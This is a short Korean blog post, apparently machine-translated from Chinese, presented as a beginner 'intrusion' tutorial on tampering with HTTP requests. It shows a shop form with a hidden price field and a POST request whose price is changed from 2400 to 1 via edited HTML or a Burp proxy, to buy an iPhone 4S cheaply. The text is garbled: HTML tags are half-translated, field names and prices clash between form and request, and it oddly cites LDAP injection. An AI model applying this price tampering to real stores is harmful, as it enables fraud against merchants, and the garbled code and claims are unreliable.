침입 침투: HTTP 헤더의 적용

관리자 · 게시됨 2015. 2. 7. 오후 5:59:07

HTTP 헤더의 적용에 대하여

http 헤더는 웹사이트의 전송 메커니즘에서 흔히 사용되지만, 대부분의 중국 초보자들은 이 부분을 눈치채지 못했으며, 이 글은 초보자만을 위한 침입 과정에서 http 헤더의 역할에 전념하고 있습니다.

쇼핑 페이지를 예로 들어 HTTP 헤더의 역할 중 일부를 분석해 보세요.

먼저, 쇼핑 페이지의 양식을 분석해 봅시다.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br /> 

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<입력 유형="숨겨짐" 이름="price" 값="449">

<입력 유형="제출" 값="구매">

</form>

열 때 그의 http 메시지 헤더 스크린샷을 찍어 확인해 보세요

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

수량=1&가격=2400

쇼핑 페이지를 열 때 가격란이 페이지에 표시되지 않지만, 사용자가 여전히 편집하고 조작할 수 있습니다.

편집을 달성하는 방법은 두 가지가 있습니다

1. HTML 소스 코드를 수정용으로 저장한 후 브라우저에 다시 불러와 실행하세요

2. 프록시 인터셉션을 사용하여 HTTP 헤더를 수정합니다 (도구 Burp에서의 프록시 구성)

위 HTTP 헤더를 예로 들어 보겠습니다
변경 이전
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

수량=1&가격=2400

변경 이후
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

수량=1&가격=1

마지막 줄의 가격 필드는 2400이고, 1로 바꾸면 아이폰 4S를 더 저렴하게 구입할 수 있습니다.

이 글은 LDAP 주입과 같은 예상치 못한 이점에 대한 아이디어만 제공합니다.

[안전 튜토리얼] 침입 침투: HTTP 헤더의 적용

관련 게시물

본 섹션